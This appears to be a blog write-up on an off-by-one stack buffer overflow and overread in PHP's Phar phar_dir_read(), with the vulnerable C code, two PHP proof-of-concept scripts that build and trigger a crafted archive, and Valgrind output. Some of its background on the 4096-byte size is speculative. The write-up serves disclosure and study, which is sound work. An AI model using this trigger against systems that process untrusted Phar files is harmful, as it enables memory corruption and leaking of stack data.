Logo

[Advanced] Buffer overflow and overread in Phar PHP

The mishandling of buffers within the function phar_dir_read()


Mise-en-contexte

In the intricate landscape of software development, meticulous attention to detail is paramount, especially when it comes to managing buffers. However, even the most seasoned developers can encounter pitfalls.

In this article, we dig into a critical issue within the function phar_dir_read(), where mishandling buffers sets off a chain reaction, culminating in a buffer overflow & create a potential for an RCE. Let's explore the nuances of this technical challenge and its implications.

Quick overview of the buf reference

In super simple, "buf" refers to a buffer, which is a region of memory used to temporarily hold data. Buffers are commonly used in programming to store information, such as file contents, network data, or other types of data that need to be processed.

The term "offset" refers to the position within a buffer or memory region where data is located.

Overview of phar_dir_read

The phar_dir_read() function is a part of the PHP Phar extension, which is used for creating and manipulating Phar archives. These archives are essentially PHP libraries or applications packaged into a single file for easy distribution and deployment.

The phar_dir_read() function is specifically responsible for reading the contents of a directory within a Phar archive. When iterating through the files and directories within the Phar archive, this function is invoked to retrieve information about each item. This information typically includes the filename, file size, and other metadata associated with the file or directory.

However, as mentioned earlier, there may be instances where this function mishandles buffers, leading to vulnerabilities such as buffer overflows or buffer overreads. These vulnerabilities can arise when the function fails to properly manage the memory allocated for storing directory information, potentially allowing malicious actors to exploit the system.

Therefore, it's crucial for developers to thoroughly review and test functions like phar_dir_read() to ensure that they handle buffers securely and prevent any potential security risks.

If we take into consideration this snippet;

/**
 * Function: phar_dir_read
 * Description: Used to read directory entries from a Phar directory handle opened with opendir().
 */
static ssize_t phar_dir_read(php_stream *stream, char *buf, size_t count) /* {{{ */
{
    size_t bytes_to_read;
    HashTable *dir_data = (HashTable *)stream->abstract;
    zend_string *dir_entry;
    zend_ulong index;

    if (HASH_KEY_NON_EXISTENT == zend_hash_get_current_key(dir_data, &dir_entry, &index)) {
        return 0;
    }

    zend_hash_move_forward(dir_data);
    bytes_to_read = MIN(ZSTR_LEN(dir_entry), count);

    if (bytes_to_read == 0 || count < ZSTR_LEN(dir_entry)) {
        return 0;
    }

    memset(buf, 0, sizeof(php_stream_dirent));
    memcpy(((php_stream_dirent *) buf)->d_name, ZSTR_VAL(dir_entry), bytes_to_read);
    ((php_stream_dirent *) buf)->d_name[bytes_to_read + 1] = '\0';

    return sizeof(php_stream_dirent);
}
/* }}} */

There are a few potential issues:

The conditional statement to_read == 0 || count < ZSTR_LEN(dir_entry) is incorrect. Specifically, when this statement evaluates to false, it implies that count >= ZSTR_LEN(dir_entry).

Moreover, due to the assignment to_read = MIN(ZSTR_LEN(dir_entry), count), it results in to_read being equal to ZSTR_LEN(dir_entry). If the length of the filename (ZSTR_LEN(dir_entry)) matches the size of php_stream_dirent, which typically is 4096 on most Linux systems, then ZSTR_LEN(dir_entry) == count == to_read == sizeof(php_stream_dirent).

Now, focusing on the line ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';, assuming sizeof(php_stream_dirent) is 4096, as is common in many Linux systems, it implies writing at offset 4097, which exceeds the bounds of buf by two bytes. Originally, the intent was to use to_read instead of to_read + 1 in this line. Even with this correction, there's still a problem as it would write at offset 4096, which remains outside the bounds of buf. Consequently, this situation leads to a potential stack information leak and a buffer write overflow.

Both the memset operation and the return value rely on the assumption that count == sizeof(php_stream_dirent). In theory, if there are any callers where the count is smaller, a buffer overflow could occur during the memset operation. While within PHP itself, no such callers were identified, this concern may arise with third-party extensions.

Understanding the sizeof(php_stream_dirent)

The expression sizeof(php_stream_dirent) returns the size, in bytes, of the data structure php_stream_dirent. In this specific context, the size is stated to be 4096 bytes.

The data structure php_stream_dirent likely represents directory entry information within the PHP stream wrapper system. A directory entry typically includes metadata such as the filename, file size, and other attributes associated with files within a directory.

Therefore, when sizeof(php_stream_dirent) is mentioned as 4096 bytes, it implies that the directory entry structure, php_stream_dirent, occupies a memory space of 4096 bytes. This information is important for memory management and understanding the data structure's layout in memory.

In Linux, directory entries typically have a fixed size, which is a multiple of the underlying file system's block size. The value of 4096 bytes is significant because it corresponds to the default block size used by many Linux file systems, such as ext4. This default block size influences various aspects of file system management, including directory structure and organization.

Additionally, the size of 4096 bytes aligns well with memory management principles, as it is a power of 2 and easily accommodates directory entry data and metadata without excessive fragmentation or wasted space.

As a result, the size of 4096 bytes for php_stream_dirent is common in Linux systems due to the alignment with file system block sizes and memory management considerations. However, it's essential to note that this size may vary in certain cases or on different operating systems depending on specific configurations or file system settings.

In this context, "offset 4097" means that the writing operation is attempted at the position 4097 bytes from the beginning of the buffer.

In the line ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';, buf is a pointer to a buffer containing data of type php_stream_dirent. The expression ((php_stream_dirent *) buf)->d_name[to_read + 1] accesses a specific element within the d_name array, located at the position specified by the variable to_read. The +1 is used to add an additional byte to the position, possibly for null-termination purposes.

However, in this case, the calculation leads to writing beyond the bounds of the buffer (buf), which can result in memory corruption and potential security vulnerabilities. This situation is referred to as a buffer overflow, where data is written beyond the allocated memory space.

Proof of Concept

I have generated a reproducer utilizing PHP-8.0, incorporating the following configuration flags during compilation: ./configure --enable-debug --disable-all --enable-phar --with-valgrind, employing the gcc compiler (GCC) version 13.1.1 20230429.

This is the loaded Phar file I've crafted for this Proof of Concept (PoC):

<?php
// Define the maximum path length
$maxPathLength = PHP_MAXPATHLEN - 1;

// Create a new Phar archive
$phar = new Phar('myarchive.phar');

// Start buffering changes
$phar->startBuffering();

// Add a file to the Phar archive with a path length of PHP_MAXPATHLEN - 1 characters followed by 'B'
$filePath = str_repeat('A', $maxPathLength).'B';
$fileContent = 'This is the content of the file.';
$phar->addFromString($filePath, $fileContent);

// Stop buffering changes
$phar->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
// Define the Phar archive path
$pharPath = "phar://./myarchive.phar";

// Open the Phar archive
$handle = opendir($pharPath);

// Read the contents of the Phar archive
$file = readdir($handle);

// Close the Phar archive
closedir($handle);

// Output the result
var_dump($file);
?>

When executed in Valgrind, specifically by running valgrind ./sapi/cli/php trigger.php, you'll encounter two Valgrind complaints:

==42575== Conditional jump or move depends on uninitialised value(s)
==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
==42575==    by 0x788A53: do_cli (php_cli.c:949)
==42575==    by 0x789ADB: main (php_cli.c:1337)
==42575== 
==42575== Syscall param write(buf) points to uninitialised byte(s)
==42575==    at 0x4AA2BC4: write (write.c:26)
==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
==42575==    by 0x611034: php_output_op (output.c:1082)
==42575==    by 0x60F2B7: php_output_write (output.c:261)
==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
==42575==    by 0x5B432A: zif_var_dump (var.c:218)
==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
==42575==    by 0x5F6D45: php_execute_script (main.c:2546)

The initial complaint arises from the fact that the strlen() function extends beyond the bounds of the d_name buffer due to its inadequate NUL-termination.

The subsequent complaint occurs when the var_dump function attempts to output the name, which includes uninitialized stack data.

Valgrind does not flag the stack buffer write overflow, but examination of memory through tools like GDB may reveal overwritten sections of the stack.

In terms of impact, exploiting this vulnerability is challenging and heavily reliant on the targeted application. However, in theory, it could be achieved through a combination of stack information leaks and buffer write overflows. Individuals inspecting the contents of untrusted Phar files could potentially be affected.

Jay ☕